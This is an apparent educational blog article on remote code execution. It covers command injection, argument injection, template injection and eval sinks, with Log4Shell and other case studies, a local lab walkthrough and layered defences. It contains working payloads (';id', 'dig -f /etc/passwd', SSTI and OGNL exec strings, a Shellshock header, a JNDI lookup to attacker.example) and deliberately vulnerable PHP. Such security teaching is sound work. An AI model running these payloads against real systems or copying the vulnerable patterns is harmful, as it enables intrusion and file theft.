TechEarl

Remote Code Execution (RCE): The Complete 2026 Practitioner Guide

Remote code execution explained from the sink level up. Command injection, argument injection past escapeshellarg, server-side template injection, and direct eval, with a Dockerised lab that reproduces each one, plus the defences that actually contain blast radius.

Ishan Karunaratne · 20 min read
Remote code execution attack chain through command injection

Remote code execution is the top of the impact pyramid. Every other web vulnerability class wants to reach RCE eventually, because once an attacker can run code on your host they are no longer attacking your application, they are attacking the machine. The application is just the door they walked through.

This article is the deep dive companion to the web application security vulnerabilities taxonomy. I cover what RCE is, walk the three primitives I see most often in code review (command injection, argument injection past escapeshellarg, and server-side template injection), cover direct eval() sinks as a bonus pattern, then run a working exploit against each one in a Dockerised lab. The defences come after, with the same depth.

What is remote code execution?

Remote code execution is a vulnerability where an attacker, communicating with the application over the network, gets the server to execute code or shell commands of the attacker's choosing. The "remote" qualifier separates it from local code execution, which assumes the attacker already has a shell or a user account on the box. RCE is the one where the attacker walks in from the internet.

The mechanism is always the same shape: untrusted bytes from the request cross a boundary into something that parses bytes as code. That something might be /bin/sh (command injection), a binary's own argument parser (argument injection), a template engine (SSTI), or the language's own runtime (eval, pickle.loads, Java deserialization). Different sinks, identical underlying mistake.

In the OWASP Top 10 (2021 edition), RCE lives under A03 Injection alongside SQL injection and the other "untrusted input parsed as code" classes. CWE catalogues the most common forms separately: CWE-78 for OS command injection and CWE-94 for the broader "improper control of code generation" pattern. The CVE record covers everything from a 1996 fingerd bug to last quarter's Confluence advisory. The class is older than the web.

Why does every other bug aspire to RCE? Because RCE collapses the difference between application security and infrastructure security. An SQL injection lets an attacker read your database. An SSRF lets them ping your metadata service. An RCE lets them do both, plus install a backdoor, plus pivot to the database server, plus persist past your next deploy. RCE is what the incident response Slack channel looks like when the alert turns out to be real.

The three RCE primitives

Three sinks account for the vast majority of web-side RCEs I run into. Each one has a distinct vulnerable pattern and a distinct fix, but they share the same underlying confusion: data reached a code path.

Command injection through shell_exec and friends

The classic, the one every cheat sheet starts with. The application builds a shell command by concatenating user input, then hands the whole string to /bin/sh -c. The shell parses it before the target binary ever sees the argument, so shell metacharacters (;, |, &, backticks, $()) are interpreted as shell syntax, not as data.

Canonical vulnerable PHP:

php
$host = $_GET['host'];
$output = shell_exec("ping -c 1 -W 1 " . $host);

A normal request ?host=example.com runs ping -c 1 -W 1 example.com. An attacker request ?host=example.com;id runs ping -c 1 -W 1 example.com;id which the shell sees as two commands separated by a semicolon. The id command runs as the web user and its output ends up appended to the response.

Every language has the same family of footguns:

  • PHP: shell_exec, exec, passthru, system, backticks, popen, and proc_open when the command is passed as a string (the array form, available since PHP 7.4, bypasses the shell).
  • Python: os.system, subprocess.run(..., shell=True), os.popen.
  • Node.js: child_process.exec, child_process.execSync. The safer siblings are execFile and spawn with an argv array.
  • Ruby: backticks, Kernel#system with a single string argument, %x{...}, IO.popen with a string.
  • Java: Runtime.exec(String) with a single string is shell-like in spirit (it tokenises naively); the array variant is safer but still vulnerable to argument injection (see next section).

The common factor is "single string handed to a shell". The fix is "pass arguments as arguments, never as a concatenated string".
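To make the string-versus-argv difference concrete, here is a minimal Python sketch. It uses echo as a harmless stand-in for ping, and the function names and payload are illustrative assumptions rather than lab code. It also assumes a POSIX system where shell=True means /bin/sh.

```python
import subprocess

def run_concatenated(host: str) -> str:
    """VULNERABLE shape: one string handed to /bin/sh -c."""
    done = subprocess.run(
        "echo pinging " + host,  # the shell parses this whole string
        shell=True, capture_output=True, text=True,
    )
    return done.stdout

def run_argv(host: str) -> str:
    """Safer shape: argv array, no shell, host stays a single argument."""
    done = subprocess.run(
        ["echo", "pinging", host],
        capture_output=True, text=True,
    )
    return done.stdout

payload = "example.com; echo INJECTED"
print(run_concatenated(payload))  # two lines: the shell ran a second command
print(run_argv(payload))          # one line: the payload is printed as data
```

The only difference between the two functions is who splits the command into arguments: the shell in the first, the caller in the second.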

Argument injection past escapeshellarg

This one bites people who think they fixed command injection. escapeshellarg (and its cousins shlex.quote, Node's shell-quote, Ruby's Shellwords.shellescape) correctly wraps the user input in quotes and escapes the shell metacharacters inside it, so ;, |, and $() cannot break out. The string the shell sees is one quoted argument. Good, that closes the shell-metacharacter hole.

What it does not solve is the called binary's own argument parser. If the user's value starts with a dash, most Unix tools interpret it as a flag, even when it is correctly shell-quoted. The shell hands one argument to the binary, the binary looks at the first character, sees -, and reads the rest as an option.

The canonical example, from the lab:

php
$domain = $_GET['domain'];
$output = shell_exec("dig " . escapeshellarg($domain));

A normal request ?domain=example.com runs dig 'example.com'. The single-quoted form is correct shell-wise. An attacker request ?domain=-f /etc/passwd runs dig '-f /etc/passwd'. The shell hands dig the literal argument -f /etc/passwd. dig looks at it, sees the leading dash, and parses -f as the batch-file flag. It opens /etc/passwd, reads each line as a DNS query, fails to parse it as a hostname, and dumps the file contents into its error output, which the web app passes back in the response.

dig -f is one example of a wide family:

  • curl -K <file>, curl -o <path> (overwrite anything), curl --upload-file.
  • find . -exec <cmd> {} ; (arbitrary command execution by design).
  • tar --use-compress-program=<cmd> (executes the program).
  • git --upload-pack=<cmd> and similar via clone of an attacker URL.
  • wget --use-askpass=<cmd>, wget -O <path>.
  • Even ssh -oProxyCommand=<cmd> is a classic in this family.

The fix at the call site is to refuse any user value that starts with -, or better, to pass -- before the user arguments so the binary stops looking for flags after that point: shell_exec("dig -- " . escapeshellarg($domain)). The -- convention is only as good as the tool's own option parser, and not every tool honours it, so confirm the behaviour of the binary you are calling. Even better, do not shell out at all. PHP has a perfectly good DNS resolver in the standard library; the same is true of every other language.
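The two parsing layers can be separated in a short Python sketch. Everything here is a stand-in under stated assumptions: "lookup" is a made-up tool name, shlex plays the role of the shell, and getopt plays the role of a tool whose -f option takes a file name. It is not a model of dig's real parser.

```python
import getopt
import shlex

def argv_after_shell(user_value: str) -> list[str]:
    """Quote the value, then split the command the way a POSIX shell would."""
    command = "lookup " + shlex.quote(user_value)  # "lookup" is a made-up tool
    return shlex.split(command)[1:]                # arguments the tool receives

def tool_parses(argv: list[str]):
    """Stand-in for the tool's own option parser: -f takes a file name."""
    return getopt.getopt(argv, "f:")               # returns (options, positionals)

# Shell metacharacters are neutralised: this stays one harmless argument.
print(argv_after_shell("example.com; id"))

# A leading dash survives quoting, and the parser reads it as the -f option.
argv = argv_after_shell("-f/etc/passwd")
print(tool_parses(argv))

# With "--" in front, the same value is treated as a positional argument.
print(tool_parses(["--"] + argv))
```

Quoting did its job in all three cases. The second case goes wrong at the layer quoting never touches, and the third only works because this particular parser honours the -- convention.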

Server-side template injection

Template engines exist to mix static template text with dynamic values: Hello, {{ name }}. The intended use is that name is a string the engine reads from a context dictionary, looks up safely, and inserts into the output. Server-side template injection happens when the template itself comes from user input, not just the values inside it.

A hand-rolled mini engine in PHP makes this obvious:

php
function render($tpl) {
    return preg_replace_callback('/\{\{(.+?)\}\}/', function ($m) {
        return eval('return ' . trim($m[1]) . ';');
    }, $tpl);
}

echo render($_POST['tpl']);

The intent is {{ 2 + 2 }} becoming 4. The bug is that the engine evals whatever is between the braces, in the host language. The attacker submits {{ system("id") }} and gets command execution. Submits {{ file_get_contents("/etc/passwd") }} and gets the passwd file.

Real-world engines have the same shape with extra layers. Twig (PHP), Jinja2 (Python), Liquid (Ruby), Smarty (PHP), FreeMarker (Java), Velocity (Java), Thymeleaf (Java), and Handlebars (JavaScript) have all shipped SSTI CVEs. The 2015 PortSwigger SSTI research by James Kettle is the canonical writeup of how these engines expose the host runtime through {{ ... }}, ${...}, #set(), or whatever the engine's own evaluation syntax happens to be.

The Jinja2 textbook payload is {{ ''.__class__.__mro__[1].__subclasses__() }} which walks Python's class hierarchy to find a useful subclass like subprocess.Popen, then calls it. The Twig version uses _self and the engine's internal API to reach system. The FreeMarker version uses <#assign value="freemarker.template.utility.Execute"?new()>${value("id")}. The mechanics differ. The pattern is identical: user-controlled template text, evaluator does the rest.

In 99% of the SSTI cases I see, nobody set out to render attacker-supplied templates. They are sites that use template strings in places they should not, like:

  • Email subject and body templates editable from an admin UI that turned out to be reachable by lower-privilege users.
  • A CMS field that supports "shortcodes" with an evaluation backend.
  • An ORM .format() call where the developer thought string formatting and template rendering were the same thing.
  • Logging frameworks that interpolate context variables and ended up parsing the log message as a template. (See the Log4Shell case study below.)
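The difference between "the user supplies values" and "the user supplies the template" can be sketched in Python. The first function is a port of the hand-rolled PHP engine from this section, and the second is a data-only alternative. Both function names are hypothetical, and neither reflects how Jinja2 or Twig work internally.

```python
import re

PLACEHOLDER = re.compile(r"\{\{(.+?)\}\}")

def render_unsafe(template: str) -> str:
    """VULNERABLE: evaluates whatever sits between the braces as Python."""
    return PLACEHOLDER.sub(lambda m: str(eval(m.group(1).strip())), template)

def render_safe(template: str, context: dict[str, str]) -> str:
    """Data-only: a placeholder may name a context key and nothing else."""
    def lookup(m: re.Match) -> str:
        key = m.group(1).strip()
        if key not in context:
            raise KeyError(f"unknown placeholder: {key!r}")
        return str(context[key])
    return PLACEHOLDER.sub(lookup, template)

print(render_unsafe("{{ 2 + 2 }}"))                       # intended use
print(render_unsafe("{{ __import__('os').getcwd() }}"))   # attacker reaches the runtime
print(render_safe("Hello, {{ name }}", {"name": "Ada"}))  # value inserted as data
```

In render_safe the placeholder text is only ever used as a dictionary key, so a payload like {{ 2 + 2 }} fails with a KeyError instead of being evaluated.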

Direct eval() sinks

The dumbest version of the bug, and still very much shipped. The application takes a string from the request and hands it to the language's own evaluator. PHP eval, Python eval/exec, JavaScript eval/Function(), Ruby eval/instance_eval/class_eval, Perl eval STRING. Each is documented as "do not feed this user input", and each gets fed user input regularly.

The lab includes the laziest possible version:

php
$expr = $_POST['expr'];
echo eval("return $expr;");

This is a "calculator" endpoint that accepts arithmetic and evaluates it. The intended use is expr=2+2, returning 4. The exploit is expr=system("id"), returning the output of id. Or expr=file_get_contents("/etc/passwd"). There is no escape hatch, there is no nuance: any PHP expression the attacker writes runs.

The pattern shows up in real code most often as "let admins write a formula" features, plugin systems that evaluate config strings, rules engines for fraud or routing, or quick-and-dirty scriptable webhooks. The fix is to never use the language eval for user input. If you need a constrained expression evaluator, use an actual expression library with a defined grammar (asteval in Python, expr-eval in Node, cel-go for Go). Those parse the input as data, not as host-language code.
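For the calculator case specifically, a constrained evaluator is small enough to sketch by hand. The version below is a minimal illustration built on Python's ast module, not one of the libraries named above. The function name safe_calc, the 100-character cap, and the choice of four operators are all assumptions.

```python
import ast
import operator

# Allowlist of syntax: anything not named here is rejected.
BINARY = {ast.Add: operator.add, ast.Sub: operator.sub,
          ast.Mult: operator.mul, ast.Div: operator.truediv}
UNARY = {ast.USub: operator.neg, ast.UAdd: operator.pos}

def _evaluate(node: ast.AST):
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in BINARY:
        return BINARY[type(node.op)](_evaluate(node.left), _evaluate(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY:
        return UNARY[type(node.op)](_evaluate(node.operand))
    raise ValueError(f"disallowed expression element: {type(node).__name__}")

def safe_calc(expr: str):
    """Evaluate + - * / arithmetic on numeric literals, and nothing else."""
    if len(expr) > 100:  # arbitrary cap to bound parse depth and work
        raise ValueError("expression too long")
    try:
        tree = ast.parse(expr, mode="eval")  # parses only, never executes
    except SyntaxError as exc:
        raise ValueError("not a valid expression") from exc
    return _evaluate(tree.body)

print(safe_calc("2+2"))
print(safe_calc("-(3*4)/2"))
```

Function calls, attribute access, and names are never evaluated because their node types are not on the allowlist, so a Python equivalent of the system("id") payload raises ValueError at the ast.Call node.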

The Log4Shell case study

In December 2021 the security world lost a weekend to one of the most consequential RCEs of the decade. CVE-2021-44228, Log4Shell, scored CVSS 10.0, affected Apache Log4j 2 versions 2.0-beta9 through 2.14.1 (excluding security releases 2.3.1, 2.12.2, and 2.12.3), and turned every Java application that logged user-controlled strings through a vulnerable Log4j into a remote-code-execution target. Apache shipped 2.15.0 as the initial fix on December 6, then 2.16.0 a few days later when the first fix turned out to be incomplete, then 2.17.0 and 2.17.1 over the next two weeks as related issues kept surfacing.

The mechanism is template-injection-shaped, even though Log4j is a logging library and not a template engine. Log4j 2 supports "lookups" in log messages: tokens like ${env:HOME} or ${java:version} in a log message get expanded at log time. One of the lookups is ${jndi:...}, which performs a JNDI lookup against the supplied URL. JNDI in turn supports LDAP, RMI, and other protocols. The LDAP path allows the response to specify a remote Java class to load and instantiate.

Putting that chain together: an attacker sends a request whose User-Agent header (or any other field the application logs) contains ${jndi:ldap://attacker.example/x}. The application logs the request. Log4j parses the log message, sees the lookup, performs the JNDI request, the LDAP server returns a reference to a remote class, the JVM downloads and instantiates the class, and the class's constructor runs whatever code the attacker chose. RCE through a log line.
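The ordering mistake at the heart of that chain can be shown with a toy logger in Python. This is not Log4j's implementation. The ${name:arg} syntax is borrowed for illustration, HANDLERS is a hypothetical lookup table, and "upper" stands in for a far more powerful lookup such as jndi.

```python
import re

LOOKUP = re.compile(r"\$\{(\w+):([^}]*)\}")

# Hypothetical lookup table; "upper" stands in for something powerful like jndi.
HANDLERS = {"upper": str.upper, "len": lambda arg: str(len(arg))}

def expand(text: str) -> str:
    """Replace ${name:arg} tokens using HANDLERS; unknown names are left alone."""
    def run(m: re.Match) -> str:
        handler = HANDLERS.get(m.group(1))
        return handler(m.group(2)) if handler else m.group(0)
    return LOOKUP.sub(run, text)

def log_vulnerable(pattern: str, user_value: str) -> str:
    """Merges user data first, then expands lookups over the merged line."""
    return expand(pattern.replace("{}", user_value))

def log_safer(pattern: str, user_value: str) -> str:
    """Expands lookups in the developer-written pattern only, then adds the data."""
    return expand(pattern).replace("{}", user_value)

header = "${upper:pwned}"  # attacker-controlled User-Agent value
print(log_vulnerable("User-Agent: {}", header))  # the lookup fires on user data
print(log_safer("User-Agent: {}", header))       # the token is logged verbatim
```

The two functions call the same helpers in a different order, and that order decides whether request data is ever handed to the lookup machinery.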

The article-length lessons:

  1. Data reaches code through paths you did not design. Nobody wrote Log4j to be a remote class loader. The behaviour emerged from the composition of features that were each individually reasonable. Logging frameworks, ORM raw-query escape hatches, template helpers, image-processing format strings, and config-file evaluators are all places where data-by-intent quietly becomes code-by-implementation.
  2. Transitive blast radius is the real problem. Log4j is a dependency of half the Java ecosystem. Most teams scrambling on December 10, 2021 had never imported Log4j directly. They imported Spring, or Elasticsearch, or Solr, or Struts, which imported it transitively. The dependency graph is the attack surface.
  3. "Just upgrade" is a multi-week sentence in practice. Inventory every running JAR. Identify which version of Log4j is on the classpath of each. Coordinate with vendors for closed-source apps. Roll out without breaking anything. Re-test after every patched release, because 2.15.0 was incomplete (CVE-2021-45046), 2.16.0 had a denial-of-service issue (CVE-2021-45105), and 2.17.0 still had a narrower code-execution issue (CVE-2021-44832) that required control of the logging configuration. The incident is a real-time case study in how dependency hygiene plays out under pressure.

Walking the lab

The rce-basic lab in the techearl-labs repo reproduces all four primitives above against a tiny PHP target.

bash
docker compose up rce-basic

The lab listens on http://localhost:8085. Treat the container as compromised the moment you start it; the README spells out the safety rules (do not bind-mount your home directory, do not change the loopback binding). What follows are the exact exploit paths.

1. Command injection: /ping.php

code
GET /ping.php?host=localhost;id

The constructed command is ping -c 1 -W 1 localhost;id, parsed by /bin/sh as two commands. The page returns the ping output followed by uid=33(www-data) gid=33(www-data) groups=33(www-data). The other separators work too: |id, `id`, $(id). Each one exploits a different shell metacharacter, all because the application built the command as a single string.

2. Argument injection: /lookup.php

code
GET /lookup.php?domain=-f /etc/passwd

escapeshellarg quotes the value correctly, so what dig receives is the argument -f /etc/passwd as a single token. dig parses it as the -f batch-file flag, opens /etc/passwd, fails to parse the lines as DNS queries, and dumps the file contents through its error output. The takeaway is the one I keep repeating: escapeshellarg solves shell parsing, not binary argument parsing.

3. SSTI: /template.php

code
POST /template.php
Content-Type: application/x-www-form-urlencoded

tpl={{ system("id") }}

The hand-rolled mini engine evals the expression between the braces. Anything PHP can express runs. Other useful payloads against the same endpoint:

code
tpl={{ file_get_contents("/etc/passwd") }}
tpl=hello {{ phpversion() }}

4. Direct eval: /calc.php

code
POST /calc.php
Content-Type: application/x-www-form-urlencoded

expr=system("id")

eval("return $expr;") runs whatever PHP expression you send. expr=phpversion() is a benign fingerprint; expr=file_get_contents("/etc/passwd") is the file-read variant; expr=`id` uses the PHP backtick operator, which is itself a shell_exec alias, so the chain is request -> eval -> shell.

Four endpoints, four sinks, four shapes of the same underlying mistake.
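If you would rather script the four requests than type them, the sketch below builds them with Python's standard library. The paths, parameters, and port come from the walkthrough above. The function name lab_requests is an assumption, and nothing is sent until you pass a request to urlopen yourself. Note that the payloads must be URL-encoded on the wire (the space in -f /etc/passwd, for example).

```python
from urllib.parse import urlencode
from urllib.request import Request

BASE = "http://localhost:8085"  # lab address from the walkthrough

def lab_requests() -> dict[str, Request]:
    """Build (but do not send) one request per lab endpoint."""
    def get(path: str, params: dict[str, str]) -> Request:
        return Request(f"{BASE}{path}?{urlencode(params)}")

    def post(path: str, form: dict[str, str]) -> Request:
        # Supplying data makes urllib issue a POST with a form-encoded body.
        return Request(f"{BASE}{path}", data=urlencode(form).encode())

    return {
        "ping": get("/ping.php", {"host": "localhost;id"}),
        "lookup": get("/lookup.php", {"domain": "-f /etc/passwd"}),
        "template": post("/template.php", {"tpl": '{{ system("id") }}'}),
        "calc": post("/calc.php", {"expr": 'system("id")'}),
    }

for name, req in lab_requests().items():
    print(name, req.get_method(), req.full_url, req.data)

# To actually fire one against the running lab container:
#   from urllib.request import urlopen
#   print(urlopen(lab_requests()["ping"], timeout=5).read().decode())
```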

Modern defences

The defences below are listed in order of leverage, not order of difficulty. The high-leverage ones go first because they are the ones that actually close the class.

1. Do not shell out for things a library can do

This is the single highest-leverage defence. Most "I need to shell out" instincts come from familiarity, not necessity. If you find yourself building a dig command, your standard library has a DNS resolver. If you are building a curl command, you have an HTTP client. If you are calling convert to resize images, ImageMagick has a binding in your language and most languages also have a native image library. Shelling out is the slow, fragile, dangerous version of every one of those.

python
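# Instead of (vulnerable: hostname is interpolated into a shell string):
import subprocess
subprocess.run(f"dig +short {hostname}", shell=True)

# Use a resolver library (dnspython here, a third-party package: pip install dnspython):
import dns.resolver
answers = dns.resolver.resolve(hostname, "A")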

The library version has no shell, no argv parsing, and no metacharacter problem. It is also faster (no fork/exec) and produces structured output you do not have to scrape.

2. When you must shell out, use an argv array and a strict allowlist

If shelling out is genuinely the only option (you are calling a tool with no library equivalent), pass the arguments as an array, never as a string, and validate every user-supplied value against a strict allowlist before it gets there.

python
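import re
import subprocess

# Allowlist: the first character must be alphanumeric, so a leading dash is refused.
if not re.fullmatch(r"[a-zA-Z0-9][a-zA-Z0-9.-]*", hostname):
    raise ValueError("invalid hostname")
result = subprocess.run(
    ["dig", "+short", "--", hostname],  # argv array: no shell is involved
    capture_output=True, text=True, timeout=5,
)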

Three things going on: the regex refuses any character outside the legal hostname set (no slashes, no spaces, no leading dash), the -- tells dig that everything after it is a positional argument and not a flag (the argument-injection defence from earlier), and the array form means no shell is involved, no metacharacter parsing ever happens.

The allowlist is the part most teams skimp on. A blocklist of "dangerous characters" gets bypassed every time. An allowlist of "characters this field is allowed to contain" does not.
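A side-by-side check shows why. The sketch below is illustrative only. The BLOCKED list is a typical example of what teams write, not one taken from the lab, and the allowlist pattern is a hostname-shaped assumption that also insists on an alphanumeric first character.

```python
import re

BLOCKED = [";", "|", "&", "`", "$("]                 # a typical "dangerous characters" list
ALLOWED = re.compile(r"[a-zA-Z0-9][a-zA-Z0-9.-]*")   # what a hostname may contain

def blocklist_accepts(value: str) -> bool:
    """Accept anything that avoids the known-bad tokens."""
    return not any(token in value for token in BLOCKED)

def allowlist_accepts(value: str) -> bool:
    """Accept only values made entirely of known-good characters."""
    # DNS names top out at 253 characters in their textual form.
    return len(value) <= 253 and ALLOWED.fullmatch(value) is not None

candidates = ["example.com", "example.com\nid", "-f/etc/passwd", "a.com;id"]
for value in candidates:
    print(repr(value), blocklist_accepts(value), allowlist_accepts(value))
```

The blocklist stops the semicolon payload but waves through the newline (a command separator to the shell) and the leading-dash argument injection. The allowlist rejects all three without having to know about any of them.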

3. Refuse user-controlled templates entirely

If your template engine has a "render a string" API (Jinja2's Environment.from_string, Twig's createTemplate, Handlebars' compile), grep your codebase for every call site and check whether the template string is ever user-controlled. If it is, that is your SSTI. Convert the call site to a file-loaded template with a parameterised context dictionary; the user supplies the dictionary, never the template.

Sandboxed template environments (Jinja2's SandboxedEnvironment, Twig's sandbox extension) are a partial defence at best. Every one of them has had bypasses. If you must render attacker-controlled templates, the sandbox is the third layer behind "do not do this" and "if you do it, isolate the worker that runs it from everything sensitive".

4. Run the process unprivileged and contain its blast radius

Code-level defences fail. Assume they will and shape the runtime so that a successful exploit gets the attacker as little as possible:

  • Drop privileges. The web process runs as a dedicated user (often www-data or an app-specific UID), never as root.
  • Container with no capabilities. Run with --cap-drop=ALL, add back only what the app needs (usually nothing). cap_net_bind_service for binding low ports is the common exception, and you can avoid even that with a reverse proxy.
  • Read-only root filesystem. Mount the container with --read-only and provide writable tmpfs mounts only for the paths the app legitimately writes to. A webshell needs to write itself somewhere; a read-only root makes that harder.
  • seccomp, AppArmor, or SELinux. A seccomp profile that blocks execve from the web process is a remarkable defence: even if the attacker gets code execution inside the language runtime, they cannot fork a shell. The default Docker seccomp profile is too permissive for this; a custom profile is the real win.
  • Egress filtering. The web container should not be able to make arbitrary outbound HTTP requests. Pin its egress to the specific upstream services it actually calls. That kills the Log4Shell-style "fetch a remote class" step in its tracks.
  • Network segmentation. The web container does not need to reach the database admin port, the secrets manager over an unencrypted channel, or the metadata service. On AWS, requiring IMDSv2 with a low response hop limit is the modern answer to SSRF-into-RCE chains.

None of these prevent the bug. They make the bug less useful when it happens. That is the right framing: defence in depth assumes one layer will be wrong on any given day.
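Several of the container items above map directly onto docker run flags. The sketch below assembles them as an argv list in Python, in keeping with the argv-array advice from earlier. The image name, the seccomp profile path, and the function name are placeholders, UID/GID 33 simply mirrors the www-data user seen in the lab output, and egress filtering and segmentation are not covered because they live outside the run command.

```python
import shlex

def hardened_docker_argv(image: str, seccomp_profile: str) -> list[str]:
    """Assemble a docker run command line with the hardening flags applied."""
    return [
        "docker", "run", "--rm",
        "--user", "33:33",                             # unprivileged UID:GID, never root
        "--cap-drop=ALL",                              # start from zero capabilities
        "--read-only",                                 # read-only root filesystem
        "--tmpfs", "/tmp",                             # writable scratch space only where needed
        "--security-opt", "no-new-privileges",         # block setuid-style escalation
        "--security-opt", f"seccomp={seccomp_profile}",  # custom syscall filter
        image,
    ]

# Placeholder image and profile names, for illustration only.
argv = hardened_docker_argv("example/web-app:latest", "web-seccomp.json")
print(shlex.join(argv))  # readable form for review; run it via subprocess.run(argv)
```

Treat the output as a starting point to review against what the application actually needs, since an overly strict profile or a missing tmpfs mount will show up as a crash at startup.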

5. Telemetry that catches exploitation

For most apps the threat model that matters is opportunistic scanning, not bug bounty researchers or red teams. Make exploitation noisy:

  • Log every execve from the web user. There should not be many.
  • Alert on outbound connections from the web tier to anywhere other than the allow-listed upstreams. Log4Shell exploitation is, by its nature, an outbound LDAP/RMI request from the JVM. That call is visible at the network layer if you are looking.
  • Alert on unexpected child processes of the web server. nginx forking sh forking wget is the classic webshell shape.
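The child-process rule is simple enough to sketch as a pure function over a process snapshot. The Proc tuple, the two name sets, and the function name are assumptions for illustration. A real deployment would feed this from audit logs or an EDR agent and tune the lists to its own stack.

```python
from typing import NamedTuple

class Proc(NamedTuple):
    pid: int
    ppid: int
    name: str

WEB_SERVERS = {"nginx", "php-fpm", "apache2"}          # assumed web-tier process names
SUSPICIOUS = {"sh", "bash", "dash", "wget", "curl", "nc"}

def suspicious_descendants(procs: list[Proc]) -> list[Proc]:
    """Return shell or download tools that have a web server among their ancestors."""
    by_pid = {p.pid: p for p in procs}
    flagged = []
    for proc in procs:
        if proc.name not in SUSPICIOUS:
            continue
        seen = set()                       # guards against cycles in bad data
        parent = by_pid.get(proc.ppid)
        while parent is not None and parent.pid not in seen:
            if parent.name in WEB_SERVERS:
                flagged.append(proc)
                break
            seen.add(parent.pid)
            parent = by_pid.get(parent.ppid)
    return flagged

snapshot = [
    Proc(1, 0, "init"),
    Proc(100, 1, "nginx"),
    Proc(200, 100, "sh"),     # web server spawned a shell
    Proc(201, 200, "wget"),   # the shell fetched something
    Proc(300, 1, "bash"),     # an admin's login shell, unrelated to the web tier
]
print(suspicious_descendants(snapshot))
```

The admin's bash is not flagged because nothing in its ancestry is a web server. Ancestry is the signal here, not the process name on its own.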

Real-world incidents

The RCE history is too long for a single list. The five below are the ones I find most teachable.

Log4Shell, CVE-2021-44228 (December 2021)

Covered above. The lesson is "data reaches code through paths you did not design, and the dependency graph is the attack surface." CVSS 10.0, affected Log4j 2.0-beta9 through 2.14.1, fixed in a sequence of 2.15.0, 2.16.0, 2.17.0, 2.17.1 as related issues kept surfacing.

Shellshock, CVE-2014-6271 (September 2014)

Bash before 4.3 patch 25 mis-parsed function definitions in exported environment variables. If a variable's value started with () { ... }; <command>, Bash would parse the function, then execute the trailing command at shell startup. Combined with CGI, which exports HTTP headers as environment variables (e.g. HTTP_USER_AGENT), this turned any CGI-backed endpoint into an unauthenticated RCE: send a User-Agent of () { :; }; /usr/bin/id > /tmp/pwned and the server-side Bash invocation ran id. The class teaches what happens when "data" containers (env vars) get parsed as code (function definitions). The fix shipped within days; the cleanup took years because Bash was everywhere.

Spring4Shell, CVE-2022-22965 (March 30, 2022)

Spring Framework's data binding mechanism allowed setting nested properties on a target bean from request parameters. On JDK 9 and later, the class property of a bean exposed access to ClassLoader and, through a sequence of bean property writes, to the Tomcat access-log configuration. An attacker could rewrite the access log to a .jsp file in the web root, log a request whose payload was a JSP webshell, then hit the resulting file. Affected Spring Framework versions before 5.2.20 and 5.3.18, on JDK 9 or higher, deployed as WAR on Tomcat. The lesson is composition: each individual feature (data binding, classloader access, configurable log paths, JSP execution) was reasonable; combined they were RCE.

ImageTragick, CVE-2016-3714 (May 2016)

ImageMagick's image format handlers ran user-controllable strings through shell-out helpers (the "delegates" mechanism). A crafted file claiming to be an SVG or MVG could contain shell metacharacters in fields like url(...), and ImageMagick would invoke wget or similar with the attacker-controlled string concatenated in. Any web application that ran ImageMagick on uploaded images (so, most of them) was vulnerable. The class teaches that image-processing libraries are RCE sinks, not just CPU and memory sinks. The standard mitigation, beyond patching, was the policy.xml "remove dangerous coders" configuration that most teams still ship today.

Confluence OGNL injection, CVE-2022-26134 (June 2022)

Atlassian Confluence Server and Data Center before 7.4.17 (and several other branches) evaluated OGNL expressions inside the request URI. An attacker could send a request like /${@java.lang.Runtime@getRuntime().exec("id")}/ and Confluence would evaluate the expression as part of URL routing, executing the command. Unauthenticated, single-request RCE, exploited in the wild before the patch shipped. The class teaches that expression languages bolted onto routing or templating layers are RCE primitives waiting for an injection vector.

Where to go next

This article is the spoke. For the working knowledge:

The recurring lesson across this whole family is the same one: every place untrusted input crosses into something that parses bytes as code is a sink, and the only reliable defence is to not let the crossing happen in the first place. Everything else is depth behind that.

Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.
